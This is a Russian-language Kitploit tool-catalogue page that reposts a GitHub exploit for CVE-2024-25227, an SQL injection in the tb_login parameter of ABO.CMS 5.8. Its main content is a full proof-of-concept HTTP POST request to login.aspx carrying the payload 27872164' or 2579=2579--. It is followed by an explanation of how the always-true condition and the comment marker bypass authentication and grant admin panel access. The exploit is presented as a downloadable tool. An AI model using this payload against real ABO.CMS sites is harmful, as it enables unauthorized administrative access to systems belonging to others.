Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227 — SQL-инъекция для ABO.CMS 5.8, которая обходит аутентификацию через параметр tb_login, предоставляя неаутентифицированный доступ к панели администратора. Включает PoC HTTP-запрос с полезной нагрузкой. | Kitploit
Инструменты/GitHubGitHub/thetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubthetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

SQL-инъекция для ABO.CMS 5.8, которая обходит аутентификацию через параметр tb_login, предоставляя неаутентифицированный доступ к панели администратора. Включает PoC HTTP-запрос с полезной нагрузкой.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

CVE-2024-25227 Эксплойт

CVE-2024-25227 — это уязвимость SQLi в ABO.CMS 5.8, обнаруженная в параметре "tb_login"

PoC:

root@kitploit:~
POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

Детали

Полезная нагрузка — tb_login=27872164'%20or%202579%3d2579--%20, без URL-кодирования это: 27872164' or 2579=2579--

В модифицированном запросе с полезной нагрузкой вы сообщаете бэкенду, что плейсхолдер "27872164'" объединяется с условием, которое всегда истинно ("2579=2579"), и закомментировать остальную часть запроса с помощью "--", чтобы гарантировать внедрение изменённого запроса.

Это фактически обходит все проверки аутентификации, связанные с полем "tb_login", предоставляя неаутентифицированный доступ к панели управления с правами администратора.

Скачать инструмент